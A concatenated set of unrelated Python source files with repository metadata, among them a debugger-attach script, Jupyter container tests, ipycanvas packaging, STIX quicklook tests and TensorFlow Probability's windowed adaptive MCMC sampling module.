stavinski/grayhat_python_redux
|
882b66616426a5dc774331ad1894049d19702424
|
[
"MIT"
] | null | null | null |
import my_debugger
debugger = my_debugger.debugger()
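# Note: raw_input is the Python 2 builtin; under Python 3 this would be input().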
pid = raw_input("Enter PID of process to attach to: ")
debugger.attach(int(pid))
debugger.run()
debugger.detach()
| 18.777778
| 54
| 0.757396
|
2b7fb186402f997a2141bae6b11bcd88a8a32e04
| 20
|
py
|
Python
|
Boolean/Boolean15.py
|
liyuanyuan11/Python
|
d94cc7ab39e56c6e24bfc741a30da77590d1d220
|
[
"MIT"
] | null | null | null |
Boolean/Boolean15.py
|
liyuanyuan11/Python
|
d94cc7ab39e56c6e24bfc741a30da77590d1d220
|
[
"MIT"
] | null | null | null |
Boolean/Boolean15.py
|
liyuanyuan11/Python
|
d94cc7ab39e56c6e24bfc741a30da77590d1d220
|
[
"MIT"
] | null | null | null |
print(True and True)
| 20
| 20
| 0.8
|
c9966126aca41191d74a67f4a782be2fc8e310fb
| 1,868
|
py
|
Python
|
deeplearn_base/test/test_start_container.py
|
Data-drone/dl_toolk
|
a4b620fe5a9f1e1cecff14e51c711fd41003fc46
|
[
"Apache-2.0"
] | 2
|
2019-08-10T10:29:21.000Z
|
2019-08-12T14:54:12.000Z
|
deeplearn_base/test/test_start_container.py
|
Data-drone/dl_toolk
|
a4b620fe5a9f1e1cecff14e51c711fd41003fc46
|
[
"Apache-2.0"
] | null | null | null |
deeplearn_base/test/test_start_container.py
|
Data-drone/dl_toolk
|
a4b620fe5a9f1e1cecff14e51c711fd41003fc46
|
[
"Apache-2.0"
] | 1
|
2018-10-17T18:52:34.000Z
|
2018-10-17T18:52:34.000Z
|
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
import logging
import pytest
LOGGER = logging.getLogger(__name__)
@pytest.mark.parametrize(
"env,expected_server",
[
(["JUPYTER_ENABLE_LAB=yes"], "lab"),
(None, "notebook"),
],
)
def test_start_notebook(container, http_client, env, expected_server):
"""Test the notebook start-notebook script"""
LOGGER.info(
f"Test that the start-notebook launches the {expected_server} server from the env {env} ..."
)
c = container.run(
tty=True,
environment=env,
command=["start-notebook.sh"],
)
resp = http_client.get("http://localhost:8888")
logs = c.logs(stdout=True).decode("utf-8")
LOGGER.debug(logs)
assert resp.status_code == 200, "Server is not listening"
assert (
f"Executing the command: jupyter {expected_server}" in logs
), f"Not the expected command (jupyter {expected_server}) was launched"
# Checking warning messages
if not env:
msg = "WARN: Jupyter Notebook deprecation notice"
assert msg in logs, f"Expected warning message {msg} not printed"
def test_tini_entrypoint(container, pid=1, command="tini"):
"""Check that tini is launched as PID 1
Credits to the following answer for the ps options used in the test:
https://superuser.com/questions/632979/if-i-know-the-pid-number-of-a-process-how-can-i-get-its-name
"""
LOGGER.info(f"Test that {command} is launched as PID {pid} ...")
c = container.run(
tty=True,
command=["start.sh"],
)
# Select the PID 1 and get the corresponding command
cmd = c.exec_run(f"ps -p {pid} -o comm=")
output = cmd.output.decode("utf-8").strip("\n")
assert output == command, f"{command} shall be launched as pid {pid}, got {output}"
| 35.245283
| 103
| 0.661135
|
bbada056f120650b95f83a96a363e343ba3c95c5
| 598
|
py
|
Python
|
vkbottle/types/responses/likes.py
|
LouisPython217/vkbottle
|
3541bbdb66f32c2d3567b0047c36b706ac72bb3b
|
[
"MIT"
] | null | null | null |
vkbottle/types/responses/likes.py
|
LouisPython217/vkbottle
|
3541bbdb66f32c2d3567b0047c36b706ac72bb3b
|
[
"MIT"
] | null | null | null |
vkbottle/types/responses/likes.py
|
LouisPython217/vkbottle
|
3541bbdb66f32c2d3567b0047c36b706ac72bb3b
|
[
"MIT"
] | null | null | null |
import typing
from ..base import BaseModel
from vkbottle.types import objects
class IsLiked(BaseModel):
liked: objects.base.BoolInt = None
copied: objects.base.BoolInt = None
class IsLikedModel(BaseModel):
response: IsLiked = None
class Add(BaseModel):
likes: int = None
class AddModel(BaseModel):
response: Add = None
class Delete(BaseModel):
likes: int = None
class DeleteModel(BaseModel):
response: Delete = None
class GetList(BaseModel):
count: int = None
items: typing.List = None
class GetListModel(BaseModel):
response: GetList = None
| 15.736842
| 39
| 0.70903
|
c3bf0bcc6f6f35546a710791915729a195351401
| 386
|
py
|
Python
|
intermediates-python/1. Matplotlib/script_8.py
|
nhutnamhcmus/datacamp-playground
|
25457e813b1145e1d335562286715eeddd1c1a7b
|
[
"MIT"
] | 1
|
2021-05-08T11:09:27.000Z
|
2021-05-08T11:09:27.000Z
|
intermediates-python/1. Matplotlib/script_8.py
|
nhutnamhcmus/datacamp-playground
|
25457e813b1145e1d335562286715eeddd1c1a7b
|
[
"MIT"
] | 1
|
2022-03-12T15:42:14.000Z
|
2022-03-12T15:42:14.000Z
|
intermediates-python/1. Matplotlib/script_8.py
|
nhutnamhcmus/datacamp-playground
|
25457e813b1145e1d335562286715eeddd1c1a7b
|
[
"MIT"
] | 1
|
2021-04-30T18:24:19.000Z
|
2021-04-30T18:24:19.000Z
|
import matplotlib.pyplot as plt
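# gdp_cap and life_exp are assumed to be pre-loaded data lists provided by the
# exercise environment; they are not defined in this script.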
# Basic scatter plot, log scale
plt.scatter(gdp_cap, life_exp)
plt.xscale('log')
# Strings
xlab = 'GDP per Capita [in USD]'
ylab = 'Life Expectancy [in years]'
title = 'World Development in 2007'
# Add axis labels
plt.xlabel(xlab)
plt.ylabel(ylab)
# Add title
plt.title(title)
# After customizing, display the plot
plt.show()
| 17.545455
| 38
| 0.686528
|
759cc8130e60f8dcf6b86e3fe6e882374db0f382
| 399
|
py
|
Python
|
hrwros_ws/build/hrwros_week3/catkin_generated/pkg.develspace.context.pc.py
|
AshfakYeafi/ros
|
7895302251088b7945e359f60a9c617e5170a72e
|
[
"MIT"
] | null | null | null |
hrwros_ws/build/hrwros_week3/catkin_generated/pkg.develspace.context.pc.py
|
AshfakYeafi/ros
|
7895302251088b7945e359f60a9c617e5170a72e
|
[
"MIT"
] | null | null | null |
hrwros_ws/build/hrwros_week3/catkin_generated/pkg.develspace.context.pc.py
|
AshfakYeafi/ros
|
7895302251088b7945e359f60a9c617e5170a72e
|
[
"MIT"
] | null | null | null |
# generated from catkin/cmake/template/pkg.context.pc.in
CATKIN_PACKAGE_PREFIX = ""
PROJECT_PKG_CONFIG_INCLUDE_DIRS = "".split(';') if "" != "" else []
PROJECT_CATKIN_DEPENDS = "".replace(';', ' ')
PKG_CONFIG_LIBRARIES_WITH_PREFIX = "".split(';') if "" != "" else []
PROJECT_NAME = "hrwros_week3"
PROJECT_SPACE_DIR = "/home/venom/ros/hrwros_ws/devel/.private/hrwros_week3"
PROJECT_VERSION = "0.1.0"
| 44.333333
| 75
| 0.714286
|
ced59456e3d203a6b9aca6da83f1faeb930bef43
| 239
|
py
|
Python
|
torrentscraper/datastruct/tvcalendar_instance.py
|
AsiganTheSunk/python-torrent-scrapper
|
30f27962e795840b82d47398e05664429829ff2b
|
[
"Apache-2.0"
] | 5
|
2018-05-19T06:18:01.000Z
|
2020-01-14T23:17:30.000Z
|
torrentscraper/datastruct/tvcalendar_instance.py
|
AsiganTheSunk/python-torrent-scrapper
|
30f27962e795840b82d47398e05664429829ff2b
|
[
"Apache-2.0"
] | 9
|
2018-05-24T01:02:46.000Z
|
2020-02-13T22:35:43.000Z
|
torrentscraper/datastruct/tvcalendar_instance.py
|
AsiganTheSunk/python-torrent-scrapper
|
30f27962e795840b82d47398e05664429829ff2b
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python3
class TVCalendarInstance():
def __init__(self, main_month_uri):
self.main_month_uri = main_month_uri
self.next_month_uri = ''
self.previous_month_uri = ''
self.main_calendar = {}
| 26.555556
| 44
| 0.656904
|
48ef51c315db4f4c97e0a147edb1579d40e48011
| 2,493
|
py
|
Python
|
stixcore/products/tests/test_quicklook.py
|
samaloney/STIXCore
|
ad9526cc37701aabcbe64bea249cb77d2313e5c6
|
[
"BSD-3-Clause"
] | 1
|
2021-07-15T14:57:25.000Z
|
2021-07-15T14:57:25.000Z
|
stixcore/products/tests/test_quicklook.py
|
samaloney/STIXCore
|
ad9526cc37701aabcbe64bea249cb77d2313e5c6
|
[
"BSD-3-Clause"
] | null | null | null |
stixcore/products/tests/test_quicklook.py
|
samaloney/STIXCore
|
ad9526cc37701aabcbe64bea249cb77d2313e5c6
|
[
"BSD-3-Clause"
] | null | null | null |
import re
from unittest.mock import patch
import pytest
from stixcore.data.test import test_data
from stixcore.products.level0 import quicklook as qll0
from stixcore.products.level1 import quicklook as qll1
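# Each tuple is (hex TM file, product class, expected name, expected obs_beg,
# expected obs_end, expected number of data rows), matching the unpacking in
# test_quicklook below.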
testpackets = [(test_data.tmtc.TM_21_6_30, qll0.LightCurve, 'ql-lightcurve',
'0659402030f00007', '0659402958f00007', 232),
(test_data.tmtc.TM_21_6_31, qll0.Background, 'ql-background',
'0659399870f00253', '0659402958f00253', 386),
(test_data.tmtc.TM_21_6_32, qll0.Spectra, 'ql-spectra',
'0659399434f00007', '0659402538f00007', 4),
(test_data.tmtc.TM_21_6_33, qll0.Variance, 'ql-variance',
'0659399970f00007', '0659402958f00007', 747),
(test_data.tmtc.TM_21_6_34, qll0.FlareFlag, 'ql-flareflag',
'0659400170f00007', '0659402958f00007', 697),
(test_data.tmtc.TM_21_6_41_complete, qll0.EnergyCalibration, 'ql-energycalibration',
'0659318520f00000', '0659326920f00000', 1)
]
@patch('stixcore.products.levelb.binary.LevelB')
@pytest.mark.parametrize('packets', testpackets, ids=[f[0].stem for f in testpackets])
def test_quicklook(levelb, packets):
hex_file, cl, name, beg, end, size = packets
with hex_file.open('r') as file:
hex = file.readlines()
levelb.data.__getitem__.return_value = [re.sub(r"\s+", "", h) for h in hex]
ql = cl.from_levelb(levelb)
assert ql.level == 'L0'
assert ql.name == name
assert str(ql.obs_beg) == beg
# TODO enable time tests again
# assert str(ql.obs_end) == end
assert len(ql.data) == size
@patch('stixcore.products.levelb.binary.LevelB')
def test_lightcurve(levelb):
hex_file = test_data.tmtc.TM_21_6_30
with hex_file.open('r') as file:
hex = file.read()
levelb.data.__getitem__.return_value = [re.sub(r"\s+", "", hex)]
ql_lc_product_l0 = qll0.LightCurve.from_levelb(levelb)
assert ql_lc_product_l0.level == 'L0'
assert ql_lc_product_l0.name == 'ql-lightcurve'
assert len(ql_lc_product_l0.control) == 1
assert len(ql_lc_product_l0.data) == ql_lc_product_l0.control['num_samples']
ql_lc_product_l1 = qll1.LightCurve.from_level0(ql_lc_product_l0)
assert ql_lc_product_l1.level == 'L1'
assert ql_lc_product_l1.name == 'ql-lightcurve'
assert len(ql_lc_product_l1.control) == 1
assert len(ql_lc_product_l1.data) == ql_lc_product_l1.control['num_samples']
| 38.953125
| 99
| 0.677898
|
cdcdfe7f0f57635d696981e037d59b9857ff2a84
| 2,620
|
py
|
Python
|
setup.py
|
AyrtonB/ipycanvas
|
96064b7dbd86e71d47146033573c372224c14162
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
AyrtonB/ipycanvas
|
96064b7dbd86e71d47146033573c372224c14162
|
[
"BSD-3-Clause"
] | null | null | null |
setup.py
|
AyrtonB/ipycanvas
|
96064b7dbd86e71d47146033573c372224c14162
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
from __future__ import print_function
from glob import glob
from os.path import join as pjoin
from os import path
from jupyter_packaging import (
create_cmdclass, install_npm, ensure_targets,
combine_commands, ensure_python,
get_version
)
from setuptools import setup, find_packages
HERE = path.dirname(path.abspath(__file__))
# The name of the project
name = 'ipycanvas'
# Ensure a valid python version
ensure_python('>=3.5')
# Get our version
version = get_version(pjoin(name, '_version.py'))
nb_path = pjoin(HERE, name, 'nbextension', 'static')
lab_path = pjoin(HERE, name, 'labextension')
# Representative files that should exist after a successful build
jstargets = [
pjoin(nb_path, 'index.js'),
pjoin(HERE, 'lib', 'plugin.js'),
]
package_data_spec = {
name: [
'nbextension/static/*.*js*',
'labextension/**'
]
}
data_files_spec = [
('share/jupyter/nbextensions/ipycanvas',
nb_path, '*.js*'),
('share/jupyter/labextensions/ipycanvas', lab_path, '**'),
('etc/jupyter/nbconfig/notebook.d' , HERE, 'ipycanvas.json')
]
cmdclass = create_cmdclass('jsdeps', package_data_spec=package_data_spec,
data_files_spec=data_files_spec)
cmdclass['jsdeps'] = combine_commands(
install_npm(HERE, build_cmd='build'),
ensure_targets(jstargets),
)
setup_args = dict(
name=name,
description='Interactive widgets library exposing the browser\'s Canvas API',
version=version,
scripts=glob(pjoin('scripts', '*')),
cmdclass=cmdclass,
packages=find_packages(),
author='Martin Renou',
author_email='martin.renou@gmail.com',
url='https://github.com/martinRenou/ipycanvas',
license='BSD',
platforms="Linux, Mac OS X, Windows",
keywords=['Jupyter', 'Widgets', 'IPython'],
classifiers=[
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Framework :: Jupyter',
],
include_package_data = True,
install_requires = [
'ipywidgets>=7.6.0',
'pillow>=6.0',
'numpy',
'orjson'
],
extras_require = {},
entry_points = {
},
)
if __name__ == '__main__':
setup(**setup_args)
| 25.436893
| 81
| 0.659924
|
45b757f433ba659a4aef86c5df6ca3ec29726681
| 40,203
|
py
|
Python
|
tensorflow_probability/python/experimental/mcmc/windowed_sampling.py
|
axch/probability
|
b112faafc593d18e6adf4c85fa8e0ce37b29f400
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_probability/python/experimental/mcmc/windowed_sampling.py
|
axch/probability
|
b112faafc593d18e6adf4c85fa8e0ce37b29f400
|
[
"Apache-2.0"
] | null | null | null |
tensorflow_probability/python/experimental/mcmc/windowed_sampling.py
|
axch/probability
|
b112faafc593d18e6adf4c85fa8e0ce37b29f400
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021 The TensorFlow Probability Authors.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Windowed adaptation for Markov chain Monte Carlo."""
import collections
import functools
import warnings
import tensorflow.compat.v1 as tf1
import tensorflow.compat.v2 as tf
from tensorflow_probability.python.bijectors import chain
from tensorflow_probability.python.bijectors import invert
from tensorflow_probability.python.bijectors import joint_map
from tensorflow_probability.python.bijectors import reshape
from tensorflow_probability.python.bijectors import restructure
from tensorflow_probability.python.experimental.mcmc import diagonal_mass_matrix_adaptation as dmma
from tensorflow_probability.python.experimental.mcmc import initialization
from tensorflow_probability.python.experimental.mcmc import preconditioned_hmc as phmc
from tensorflow_probability.python.experimental.mcmc import preconditioned_nuts as pnuts
from tensorflow_probability.python.experimental.mcmc import preconditioning_utils
from tensorflow_probability.python.experimental.mcmc import sharded
from tensorflow_probability.python.experimental.stats import sample_stats
from tensorflow_probability.python.internal import nest_util
from tensorflow_probability.python.internal import prefer_static as ps
from tensorflow_probability.python.internal import samplers
from tensorflow_probability.python.internal import tensorshape_util
from tensorflow_probability.python.internal import unnest
from tensorflow_probability.python.math import generic as generic_math
from tensorflow_probability.python.mcmc import dual_averaging_step_size_adaptation as dassa
from tensorflow_probability.python.mcmc import kernel as kernel_base
from tensorflow_probability.python.mcmc import sample
from tensorflow_probability.python.mcmc.internal import util as mcmc_util
from tensorflow.python.ops import control_flow_util # pylint: disable=g-direct-tensorflow-import
from tensorflow.python.util import nest # pylint: disable=g-direct-tensorflow-import
__all__ = [
'windowed_adaptive_hmc',
'windowed_adaptive_nuts',
'default_nuts_trace_fn',
'default_hmc_trace_fn',
]
# Cause all warnings to always be triggered.
# Not having this means subsequent calls won't trigger the warning.
warnings.filterwarnings(
'always', module='tensorflow_probability.*windowed_sampling',
append=True) # Don't override user-set filters.
def default_nuts_trace_fn(state, bijector, is_adapting, pkr):
"""Trace function for `windowed_adaptive_nuts` providing standard diagnostics.
Specifically, these match up with a number of diagnostics used by ArviZ [1],
to make diagnostics and analysis easier. The names used follow those used in
TensorFlow Probability, and will need to be mapped to those used in the ArviZ
schema.
References:
[1]: Kumar, R., Carroll, C., Hartikainen, A., & Martin, O. (2019). ArviZ a
unified library for exploratory analysis of Bayesian models in Python.
Journal of Open Source Software, 4(33), 1143.
Args:
state: tf.Tensor
Current sampler state, flattened and unconstrained.
bijector: tfb.Bijector
      This can be used to map the flattened, unconstrained state back to the
      constrained, structured space of the model.
is_adapting: bool
Whether this is an adapting step, or may be treated as a valid MCMC draw.
pkr: UncalibratedPreconditionedHamiltonianMonteCarloKernelResults
Kernel results from this iteration.
Returns:
dict with sampler statistics.
"""
del state, bijector # Unused
energy_diff = unnest.get_innermost(pkr, 'log_accept_ratio')
return {
'step_size': unnest.get_innermost(pkr, 'step_size'),
'tune': is_adapting,
'target_log_prob': unnest.get_innermost(pkr, 'target_log_prob'),
'diverging': unnest.get_innermost(pkr, 'has_divergence'),
'accept_ratio':
tf.minimum(tf.ones_like(energy_diff), tf.exp(energy_diff)),
'variance_scaling':
unnest.get_innermost(pkr, 'momentum_distribution').variance(),
'n_steps': unnest.get_innermost(pkr, 'leapfrogs_taken'),
'is_accepted': unnest.get_innermost(pkr, 'is_accepted')}
def default_hmc_trace_fn(state, bijector, is_adapting, pkr):
"""Trace function for `windowed_adaptive_hmc` providing standard diagnostics.
Specifically, these match up with a number of diagnostics used by ArviZ [1],
to make diagnostics and analysis easier. The names used follow those used in
TensorFlow Probability, and will need to be mapped to those used in the ArviZ
schema.
References:
[1]: Kumar, R., Carroll, C., Hartikainen, A., & Martin, O. (2019). ArviZ a
unified library for exploratory analysis of Bayesian models in Python.
Journal of Open Source Software, 4(33), 1143.
Args:
state: tf.Tensor
Current sampler state, flattened and unconstrained.
bijector: tfb.Bijector
      This can be used to map the flattened, unconstrained state back to the
      constrained, structured space of the model.
is_adapting: bool
Whether this is an adapting step, or may be treated as a valid MCMC draw.
pkr: UncalibratedPreconditionedHamiltonianMonteCarloKernelResults
Kernel results from this iteration.
Returns:
dict with sampler statistics.
"""
del state, bijector # Unused
energy_diff = unnest.get_innermost(pkr, 'log_accept_ratio')
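  # Plain HMC has no NUTS-style divergence flag, so a draw is marked divergent
  # when the absolute energy error exceeds a fixed threshold of 500.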
has_divergence = tf.math.abs(energy_diff) > 500.
return {
'step_size': unnest.get_innermost(pkr, 'step_size'),
'tune': is_adapting,
'target_log_prob': unnest.get_innermost(pkr, 'target_log_prob'),
'diverging': has_divergence,
'log_acceptance_correction':
unnest.get_innermost(pkr, 'log_acceptance_correction'),
'accept_ratio':
tf.minimum(tf.ones_like(energy_diff), tf.exp(energy_diff)),
'variance_scaling':
unnest.get_innermost(pkr, 'momentum_distribution').variance(),
'is_accepted': unnest.get_innermost(pkr, 'is_accepted')}
def _get_flat_unconstraining_bijector(jd_model):
"""Create a bijector from a joint distribution that flattens and unconstrains.
The intention is (loosely) to go from a model joint distribution supported on
U_1 x U_2 x ... U_n, with U_j a subset of R^{n_j}
to a model supported on R^N, with N = sum(n_j). (This is "loose" in the sense
of base measures: some distribution may be supported on an m-dimensional
subset of R^n, and the default transform for that distribution may then
have support on R^m. See [1] for details.
Args:
jd_model: subclass of `tfd.JointDistribution` A JointDistribution for a
model.
Returns:
Two `tfb.Bijector`s where the `.forward` method flattens and unconstrains
points, and the second may be used to initialize a step size.
"""
# TODO(b/180396233): This bijector is in general point-dependent.
event_space_bij = jd_model.experimental_default_event_space_bijector()
flat_bijector = restructure.pack_sequence_as(jd_model.event_shape_tensor())
unconstrained_shapes = event_space_bij(
flat_bijector).inverse_event_shape_tensor(jd_model.event_shape_tensor())
  # This reshaping is required because split can produce a tensor of shape [1]
  # when the distribution event shape is [].
unsplit = joint_map.JointMap(bijectors=[
reshape.Reshape(event_shape_out=x, event_shape_in=[-1])
for x in unconstrained_shapes])
bij = invert.Invert(chain.Chain([event_space_bij, flat_bijector, unsplit]))
step_size_bij = invert.Invert(flat_bijector)
return bij, step_size_bij
def _setup_mcmc(model, n_chains, *, init_position=None, seed=None, **pins):
"""Construct bijector and transforms needed for windowed MCMC.
This pins the initial model, constructs a bijector that unconstrains and
flattens each dimension and adds a leading batch shape of `n_chains`,
initializes a point in the unconstrained space, and constructs a transformed
log probability using the bijector.
Note that we must manually construct this target log probability instead of
using a transformed transition kernel because the TTK assumes the shape
in is the same as the shape out.
Args:
model: `tfd.JointDistribution`
The model to sample from.
n_chains: list of ints
Number of chains (independent examples) to run.
init_position: Optional
Structure of tensors at which to initialize sampling. Should have the
same shape and structure as
`model.experimental_pin(**pins).sample_unpinned(n_chains)`.
seed: PRNG seed; see `tfp.random.sanitize_seed` for details.
**pins:
Values passed to `model.experimental_pin`.
Returns:
target_log_prob_fn: Callable on the transformed space.
initial_transformed_position: `tf.Tensor`, sampled from a uniform (-2, 2).
bijector: `tfb.Bijector` instance, which unconstrains and flattens.
step_broadcast_fn: Callable to broadcast step size over latent structure.
batch_shape: Batch shape of the model.
shard_axis_names: Shard axis names for the model
"""
pinned_model = model.experimental_pin(**pins) if pins else model
bijector, step_bijector = _get_flat_unconstraining_bijector(pinned_model)
if init_position is None:
raw_init_dist = initialization.init_near_unconstrained_zero(pinned_model)
init_position = initialization.retry_init(
raw_init_dist.sample,
target_fn=pinned_model.unnormalized_log_prob,
sample_shape=n_chains,
seed=seed)
initial_transformed_position = tf.nest.map_structure(
tf.identity, bijector.forward(init_position))
batch_shape = pinned_model.batch_shape
if tf.nest.is_nested(batch_shape):
batch_shape = functools.reduce(tf.broadcast_static_shape,
tf.nest.flatten(batch_shape))
lp_static_shape = tensorshape_util.concatenate(n_chains, batch_shape)
if not tensorshape_util.is_fully_defined(batch_shape):
batch_shape = pinned_model.batch_shape_tensor()
if tf.nest.is_nested(batch_shape):
batch_shape = functools.reduce(tf.broadcast_dynamic_shape,
tf.nest.flatten(batch_shape))
# This tf.function is not redundant with the ones on _fast_window
# and _slow_window because the various kernels (like HMC) may invoke
# `target_log_prob_fn` multiple times within one window.
@tf.function(autograph=False)
def target_log_prob_fn(*args):
lp = pinned_model.unnormalized_log_prob(bijector.inverse(args))
tensorshape_util.set_shape(lp, lp_static_shape)
ldj = bijector.inverse_log_det_jacobian(
args, event_ndims=[1 for _ in initial_transformed_position])
return lp + ldj
def step_broadcast(step_size):
# Only apply the bijector to nested step sizes or non-scalar batches.
if tf.nest.is_nested(step_size):
return step_bijector(
nest_util.broadcast_structure(pinned_model.event_shape_tensor(),
step_size))
else:
return step_size
shard_axis_names = pinned_model.experimental_shard_axis_names
if any(tf.nest.flatten(shard_axis_names)):
shard_axis_names = nest.flatten_up_to(
initial_transformed_position, pinned_model._model_flatten( # pylint: disable=protected-access
shard_axis_names))
else:
# No active shard axis names
shard_axis_names = None
return (target_log_prob_fn,
initial_transformed_position,
bijector,
step_broadcast,
ps.convert_to_shape_tensor(batch_shape, name='batch_shape'),
shard_axis_names)
def _make_base_kernel(*, kind, proposal_kernel_kwargs):
"""Construct internal sampling kernel."""
if kind == 'nuts':
return pnuts.PreconditionedNoUTurnSampler(**proposal_kernel_kwargs)
elif kind == 'hmc':
return phmc.PreconditionedHamiltonianMonteCarlo(**proposal_kernel_kwargs)
else:
raise TypeError(
'`kind` must be "nuts" or "hmc" (got {kind})'.format(kind=kind))
def make_fast_adapt_kernel(*,
kind,
proposal_kernel_kwargs,
dual_averaging_kwargs):
return dassa.DualAveragingStepSizeAdaptation(
_make_base_kernel(
kind=kind, proposal_kernel_kwargs=proposal_kernel_kwargs),
**dual_averaging_kwargs)
def make_slow_adapt_kernel(*,
kind,
proposal_kernel_kwargs,
dual_averaging_kwargs,
initial_running_variance):
return dmma.DiagonalMassMatrixAdaptation(
make_fast_adapt_kernel(
kind=kind,
proposal_kernel_kwargs=proposal_kernel_kwargs,
dual_averaging_kwargs=dual_averaging_kwargs),
initial_running_variance=initial_running_variance,
num_estimation_steps=dual_averaging_kwargs['num_adaptation_steps'])
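# Worked example (not executed here): num_adaptation_steps=500 yields
# slow_window_size=25, first_window_size=75 and last_window_size=50; the four
# slow windows then double in length as 25, 50, 100 and 200 steps.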
def _get_window_sizes(num_adaptation_steps):
"""Hardcoded way to get a reasonable scheme.
This assumes we do something proportional to
fast window: 75 steps
slow window: 25 steps
slow window: 50 steps
slow window: 100 steps
slow window: 200 steps
fast window: 50 steps
Which is a total of 500 steps.
Args:
num_adaptation_steps: int Number of adaptation steps to run.
Returns:
The first window size, the initial slow window size, the last window size.
"""
slow_window_size = num_adaptation_steps // 20
first_window_size = 3 * slow_window_size
last_window_size = (num_adaptation_steps -
15 * slow_window_size -
first_window_size)
return first_window_size, slow_window_size, last_window_size
class WindowedAdaptationResults(mcmc_util.PrettyNamedTupleMixin,
collections.namedtuple(
'WindowedAdaptationResults', [
'inner_results',
'step',
])):
"""Results of the WindowedAdaptation TransitionKernel.
Attributes:
inner_results: Results of the inner kernel.
step: Int32 scalar `Tensor`. The current step number as perceived by this
kernel. Increases by 1 for every call to `one_step`.
"""
__slots__ = ()
class WindowedAdaptation(kernel_base.TransitionKernel):
"""A transition kernel to control warmup adaptation.
This assumes we do something proportional to
fast window: 75 steps
slow window: 25 steps
slow window: 50 steps
slow window: 100 steps
slow window: 200 steps
fast window: 50 steps
Which is a total of 500 steps.
We will adapt step size during both fast and slow windows. Mass matrix is
only adapted during the slow windows.
"""
def __init__(self, inner_kernel, num_adaptation_steps, name=None):
"""Initializes this transition kernel.
Args:
inner_kernel: `TransitionKernel`-like object.
num_adaptation_steps: Scalar `int` `Tensor` number of initial steps during
which to adjust the step size and mass matrix. This may be greater, less
than, or equal to the number of burnin steps.
name: Python `str` name prefixed to Ops created by this class. Default:
'windowed_adaptation'.
"""
inner_kernel = mcmc_util.enable_store_parameters_in_results(inner_kernel)
self._parameters = dict(
inner_kernel=inner_kernel,
num_adaptation_steps=num_adaptation_steps,
name=name,
)
@property
def parameters(self):
return self._parameters
@property
def inner_kernel(self):
return self._parameters['inner_kernel']
@property
def num_adaptation_steps(self):
return self._parameters['num_adaptation_steps']
@property
def name(self):
return self._parameters['name']
def one_step(self, current_state, previous_kernel_results, seed=None):
previous_inner_results = previous_kernel_results.inner_results
previous_step = previous_kernel_results.step
num_adaptation_steps = tf.cast(self.num_adaptation_steps, dtype=tf.int32)
first_window_size, slow_window_size, last_window_size = _get_window_sizes(
num_adaptation_steps)
def first_fast_window_update():
dmma_results = previous_inner_results
dassa_results = dmma_results.inner_results._replace(
num_adaptation_steps=first_window_size + slow_window_size)
return dmma_results._replace(
inner_results=dassa_results,
# Skip mass matrix adaptation.
num_estimation_steps=tf.constant(-1, dtype=tf.int32))
def first_slow_window_update():
dmma_results = previous_inner_results
# Start mass matrix adaptation.
return dmma_results._replace(
step=tf.constant(0, dtype=tf.int32),
num_estimation_steps=slow_window_size)
def slow_window_update():
curr_slow_window_size = (
previous_step - first_window_size + slow_window_size)
# Reset mass matrix adaptation.
dmma_results = self.inner_kernel._bootstrap_from_inner_results( # pylint: disable=protected-access
current_state, previous_inner_results.inner_results)
# Reset step size adaptation.
dassa_inner_results = self.inner_kernel.inner_kernel.step_size_setter_fn(
dmma_results.inner_results.inner_results,
dmma_results.inner_results.new_step_size)
dassa_results = self.inner_kernel.inner_kernel._bootstrap_from_inner_results( # pylint: disable=protected-access
current_state, dassa_inner_results)
dassa_results = dassa_results._replace(
num_adaptation_steps=curr_slow_window_size)
return dmma_results._replace(
inner_results=dassa_results,
num_estimation_steps=curr_slow_window_size)
def last_window_update():
dmma_results = previous_inner_results
# Reset step size adaptation.
dassa_inner_results = self.inner_kernel.inner_kernel.step_size_setter_fn(
dmma_results.inner_results.inner_results,
dmma_results.inner_results.new_step_size)
dassa_results = self.inner_kernel.inner_kernel._bootstrap_from_inner_results( # pylint: disable=protected-access
current_state, dassa_inner_results)
dassa_results = dassa_results._replace(
num_adaptation_steps=last_window_size)
return dmma_results._replace(inner_results=dassa_results)
is_first_fast_window_start = tf.equal(previous_step,
tf.constant(0, dtype=tf.int32))
is_first_slow_window_start = tf.equal(previous_step, first_window_size)
# Currently, we use 4 slow windows in the function _get_window_sizes.
num_slow_windows = 4
is_slow_window_start = tf.reduce_any(
tf.equal(
previous_step, first_window_size + slow_window_size * tf.constant(
[2**i - 1
for i in range(1, num_slow_windows)], dtype=tf.int32)))
is_last_window_start = tf.equal(
previous_step,
first_window_size + (2**num_slow_windows - 1) * slow_window_size)
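    # At most one of the window-boundary flags above is True on a given step,
    # so this weighted sum yields an index 0-4 into the list of candidate
    # results below (0 means no window boundary was crossed).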
option = (
tf.cast(is_first_fast_window_start, dtype=tf.int32) +
tf.cast(is_first_slow_window_start, dtype=tf.int32) * 2 +
tf.cast(is_slow_window_start, dtype=tf.int32) * 3 +
tf.cast(is_last_window_start, dtype=tf.int32) * 4)
previous_inner_results = mcmc_util.choose_from(option, [
previous_inner_results,
first_fast_window_update(),
first_slow_window_update(),
slow_window_update(),
last_window_update()
])
new_state, new_inner_results = self.inner_kernel.one_step(
current_state, previous_inner_results, seed=seed)
return new_state, previous_kernel_results._replace(
inner_results=new_inner_results, step=previous_step + 1)
def bootstrap_results(self, init_state):
return WindowedAdaptationResults(
inner_results=self.inner_kernel.bootstrap_results(init_state),
step=tf.constant(0, dtype=tf.int32))
@property
def is_calibrated(self):
return self.inner_kernel.is_calibrated
